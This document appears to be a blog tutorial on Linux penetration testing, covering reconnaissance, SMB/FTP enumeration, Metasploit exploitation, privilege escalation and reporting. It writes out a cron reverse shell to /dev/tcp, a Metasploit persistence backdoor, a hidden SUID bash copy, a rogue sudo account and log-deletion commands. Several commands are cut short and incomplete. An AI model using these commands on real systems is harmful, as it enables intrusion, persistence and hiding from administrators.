Linux Penetration Testing

Security teams simulate attacks on Linux systems to identify vulnerabilities in penetration testing. They uncover weaknesses in system configurations, software, user permissions, and network structures. Rigorous testing allows teams to proactively address these vulnerabilities, enhance system defenses, and mitigate the risk of unauthorized access or exploitation.

This blog explores the steps of Linux penetration testing and essential tools and addresses common challenges.

What is Linux Pentesting?

Linux penetration testing involves the process of identifying and exploiting vulnerabilities within Linux systems to assess their security posture. As one of the most widely used operating systems in servers, embedded systems, and personal devices, Linux is a frequent target for attackers. Penetration testers simulate real-world attacks on Linux environments to uncover weaknesses in configurations, software, permissions, and network setups.

Why Perform Linux Pentesting?

Performing Linux penetration testing is crucial for identifying vulnerabilities and security gaps in Linux systems, which are widely used across servers, cloud environments, and critical infrastructures. It helps detect misconfigurations, weak access controls, and outdated software that attackers could exploit.

By simulating real-world attacks, organizations can uncover security flaws such as privilege escalation or kernel vulnerabilities, allowing them to take proactive measures. This process strengthens system defenses by adjusting configurations, applying patches, and enhancing access control policies, thereby reducing the overall attack surface.

Additionally, Linux pentesting ensures compliance with security policies and regulatory requirements, which is vital for industries like healthcare and finance. Regular pentesting helps improve incident response by preparing organizations for potential attacks and enabling quicker detection and containment of threats.

It also enhances system monitoring, identifying areas where logging and detection capabilities need improvement. By continuously testing and refining defenses, organizations can maintain a strong security posture, protecting sensitive data and ensuring operational integrity against evolving cybersecurity threats.

Steps to Perform in Linux Pentesting

Let's dive into the essential steps to follow when conducting a Linux penetration test, ensuring a comprehensive and effective assessment of the system's security.

1. Planning and Preparation

Begin by defining the scope and objectives of the pentesting engagement. Clearly outline what the aim is, such as identifying vulnerabilities or testing the security of specific systems. Obtain all necessary permissions from the target organization to ensure activities are legal and compliant. Without proper authorization, legal consequences may arise. Gather and prepare the required tools and resources, including software like Nmap, Metasploit, and various vulnerability scanners. Having the right tools available is crucial for effective pentesting.

2. Information Gathering

In the information-gathering phase of pentesting, commands are used for reconnaissance. Tools like Nmap can be used for network scanning. For instance:

nmap -sV

This command uses the -sV flag for version detection. This enables Nmap to determine the software versions running on the target system.

Find info about the architecture

In Linux, the uname -a command is used to gather information about the system's architecture. This command displays comprehensive information including the kernel name, hostname, kernel release date, kernel version, machine, processor, hardware platform, and operating system.

uname -a

To find services

The command netstat -tuln runs in a Linux system to display the services currently running. Specifically, this command provides a list of all active network connections along with the type of protocol (TCP/UDP), the local and foreign addresses, and the state of the connections. The flags -tuln stand for TCP connections (t), UDP connections (u), listening server sockets (l), and numerical output (n), respectively. By using this command, gain insight into the network activity on the system, which is valuable for understanding potential vulnerabilities.

netstat -tuln

Find hidden files

To expose potential entry points, use the ls -al command in Linux. This command lists all files, including those hidden, and displays their permissions, providing a detailed overview of file access within the system.

ls -al

3. Enumeration

Enumeration involves probing deeper into the information gathered during reconnaissance. Enumerate the services and applications running on the target system. Identify the versions of software in use and check for known vulnerabilities associated with these versions. Gather details about users, groups, and network shares.

Enumerating SMB Service on Linux

Let's say an SMB service is discovered running on the target Linux system. Use the following tools and commands to enumerate it:

Nmap Scan for SMB

nmap -p 139,445 --script=smb-enum-shares,smb-enum-users <target_ip>

This command (JSON) scans the SMB ports (139 and 445) and uses Nmap scripts to enumerate shares and users.

enum4linux

enum4linux -a

enum4linux is a tool for extracting data from Windows and Samba hosts. The -a option runs all possible enumeration, including listing shares, users, and group memberships. This gives a thorough overview of what is exposed on the SMB service. Using enum4linux helps identify misconfigurations and potential entry points in SMB-enabled systems.

smbclient

smbclient -L

smbclient is a command-line tool for interacting with SMB/CIFS shares. The -L flag lists all available shares on the target IP, which might include sensitive or misconfigured shares open to public access. Further exploration of these shares can reveal data that can be used to escalate privileges or access confidential information.

Enumerating FTP Services on Linux

FTP is commonly used for file transfers. Scanning the service helps identify weaknesses in its configuration.

Nmap Scan for FTP

nmap -p21 --script

This Nmap scan targets the FTP port (21) and uses built-in scripts to detect anonymous access, FTP bounce vulnerabilities, and system information, providing insight into potential misconfigurations.

FTP Command-Line Client

It connects to the FTP service and often allows anonymous login. Once connected, navigate the directory and take action like uploading or downloading files. If anonymous login works, enter "anonymous" as the username and a generic email address as the password to explore publicly accessible files.

Hydra for Brute Force Attack

hydra -l <username> -P

Hydra is a powerful tool for password cracking. This command runs a brute-force attack on the FTP service using a username and a password list. It tests each combination to find valid credentials, enabling access to protected areas of the FTP server if the passwords are weak.

User and Group Enumeration

Checking /etc/passwd and /etc/group reveals the user and group accounts on a Linux system, which can be useful for privilege escalation.

cat

Lists all user accounts on the system, including system and human users. Identifying users with high privileges or those that are misconfigured can help target specific accounts during an attack.

cat

Shows all groups on the system. Knowing group memberships helps understand user roles and potential escalation paths if a lower-privilege user is part of a sensitive group.

Listing SMB Shares

smbclient -L

By listing all available SMB shares, identify which directories or files are shared over the network. Misconfigured shares might allow access to sensitive data or files without proper authentication, making it a crucial step in enumeration.

4. Vulnerability Analysis

After enumeration, analyze the target system for vulnerabilities. Use automated tools like Nessus or OpenVASto scan for vulnerabilities in the target system. These tools can quickly identify a wide range of common vulnerabilities. Manually verify and analyze scan results to identify exploitable weaknesses. Automated tools are useful, but manual verification ensures accuracy. Prioritize vulnerabilities based on their potential impact and exploitability. Focus on the most critical vulnerabilities that pose the greatest risk to the system.

5. Exploitation

With identified vulnerabilities, develop and executeexploits to gain initial access to the target system. Use frameworks like Metasploit to automate the exploitation process. Metasploit provides a wide range of pre-built exploits and payloads that can simplify work. If necessary, manually craft exploits to target specific vulnerabilities that are not covered by automated tools. The goal here is to penetrate the system and gain a foothold within the network.

Choose an Exploit Open Metasploit by typing msfconsole in the terminal. Search for an exploit that matches the identified vulnerability.

search <vulnerability

Select the Exploit Select the appropriate exploit from the search results.

use <exploit_path

Configure the Exploit Set the target IP address and other necessary parameters.

set RHOST <target_ip>
set RPORT <target_port

Choose a Payload Select a payload to execute on the target system.

set payload <payload_path

Configure the Payload Set the options for the payload, such as the local IP address and port for the reverse shell.

set LHOST <local_ip>
set LPORT <local_port

Run the Exploit Execute the exploit to gain access to the target system.

exploit

6. Post-Exploitation

After gaining access to the target system, secure a stable and persistent presence. Maintain access over time and ensure the ability to return to the compromised system if necessary. Follow the steps and use the appropriate tools to maximize post-exploitation effectiveness.

Establish Persistence

To establish persistence, create a backdoor or set a cron job on the compromised system.

Create a Backdoor

Use Metasploit to establish a persistent backdoor with the command:

run persistence -U -i 5 -p 4444 -r

The command run persistence -U -i 5 -p 4444 -r <local_ip> is used in Metasploit to create a persistent backdoor on a target system. It works by setting up a mechanism that reconnects to the attacker's machine every 5 seconds (-i 5) on the specified port 4444 (-p 4444). The -U option makes this backdoor initiate upon user login, while -r <local_ip> designates the attacker's IP as the target for this persistent connection. This ensures that the attacker retains access even if the target restarts or loses connection.

Add a Cron Job

To automate access on Unix-based systems, add a reverse shell using cron:

echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/<local_ip>/<port> 0>&1'"

The command echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/<local_ip>/<port> 0>&1'" >> /etc/crontab adds a new cron job to the system's crontab file, scheduling a reverse shell connection every 5 minutes. The cron job uses bash to open an interactive shell (-i), redirecting input and output to a specified IP and port (/dev/tcp/<local_ip>/<port>). This redirection essentially creates a reverse shell that connects to the attacker's machine, allowing continuous access to the compromised system.

7. Privilege Escalation

Identify and exploit vulnerabilities that allow privilege escalation. Look for misconfigured SUID/SGID binaries, weak file permissions, and vulnerable services. These weaknesses enable the elevation of privileges on the system. Use tools and techniques to move from a low-privilege user to root or administrative access. Privilege escalation is crucial for gaining full control over the system and accessing all its resources.

Exploit SUID/GUID Binaries Search for SUID binaries that can be exploited for privilege escalation.

find / -perm -4000 -type f 2

To identify potentially vulnerable SUID binaries and exploit them for privilege escalation, use the Linux Exploit Suggester tool. First, download the script:

wget <https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh>
chmod

The script compares kernel version against a list of known exploits and suggests privilege escalation vectors.

Next, to exploit a vulnerable SUID binary, use GTFOBins (a resource for privilege escalation). Run the binary with elevated privileges using the following command:

<binary_name> -p

Replace <binary_name> with the actual binary name found in the enumeration process.

8. Maintaining Access

Install backdoors or create persistent accounts to ensure return access to the compromised system. Use techniques like cron jobs, startup scripts, or rootkits to maintain continued access. Persistence mechanisms allow long-term control over the system, even after reboot or partial restoration. Avoid detection by modifying or clearing logs and monitoring systems. Covering tracks help remain undetected by security personnel.

To add a new user with administrative privileges on a Linux system, use the following commands:

useradd -m -s /bin/bash -G sudo <new_user>
echo '<new_user>:<password>'

The useradd command creates a new user, sets their shell to /bin/bash, and adds them to the sudo group for administrative access. The chpasswd command sets the password for this user.

To modify system binaries to create a backdoor, execute:

cp /bin/bash /tmp/.bash_backdoor
chmod

This copies the bash shell to a hidden file (.bash_backdoor) and assigns SUID permissions, enabling it to run as root, creating a potential privilege escalation path.

9. Covering Tracks

Clear command history and logs after activities to erase evidence of presence. Modify timestamps and remove traces of any tools used. Ensure the system appears unaltered to avoid raising suspicion. Covering tracks is essential for avoiding detection and maintaining the integrity of pentesting activities.

To clear command history and avoid detection, use the following commands:

history -c

The history -c command clears the current session's command history and redirects to ~/.bash_history, emptying the history file and effectively erasing past activities.

To delete specific log entries related to activities:

sed -i '/<search_term>/d' /var/log/auth.log
sed -i '/<search_term>/d'

These sed commands search for lines containing <search_term> in log files like auth.log and syslog, and delete them to remove traces of the actions.

10. Reporting

Document all findings, including discovered vulnerabilities, used exploits, and accessed data. Describe each vulnerability in detail, including its potential impact and remediation steps. Create an executive summary that highlights the overall security posture and key recommendations. Use the report to communicate findings to the target organization and help them understand the risks and necessary actions.

Linux Pentesting Challenges

Linux pentesting presents several challenges that security professionals must navigate to conduct thorough and effective assessments. Let's explore some of the key obstacles faced during Linux penetration testing:

Complex System Configurations

Linux systems often involve complex configurations that can make vulnerability identification challenging. Each system’s unique setup requires a thorough examination to ensure that no potential security flaws are missed. This complexity demands careful attention to detail when performing security assessments.

Security Mechanism Bypass

Modern Linux distributions integrate security mechanisms like SELinux or AppArmor, designed to protect against attacks. Bypassing these layers requires a high level of technical knowledge and precision to avoid detection or disruption of the system. Penetration testers must thoroughly test and understand these defenses.

Privilege Escalation

Initial access to a Linux system is often restricted, so escalating privileges relies on exploiting misconfigurations or vulnerabilities. This process can be challenging and may require innovative exploitation techniques to move from limited user access to administrative control.

Dealing with Log and Monitoring Systems

Linux systems typically have robust logging and monitoring systems that can detect and alert administrators to suspicious activities. Evading or manipulating these logs without being detected requires strategic planning and an understanding of how these systems operate.

Variability Across Distributions

Linux distributions like Ubuntu, CentOS, and Red Hat implement different default configurations, security policies, and package management systems. Penetration testers must adapt their techniques to each distribution's unique environment, requiring flexibility and a broad skill set.

Final Thoughts

Linux penetration testing is essential for identifying security vulnerabilities and providing organizations with valuable insights to strengthen their defense strategies. It requires a systematic approach, attention to detail, and advanced problem-solving capabilities to uncover and address potential risks effectively. By meticulously analyzing each phase of the process—reconnaissance, exploitation, and remediation—security professionals ensure comprehensive protection of the system. Regular Linux pentesting enables organizations to stay ahead of emerging threats, enhancing system resilience and fostering a proactive security culture. This continuous effort fortifies Linux environments against the growing complexity of cyberattacks.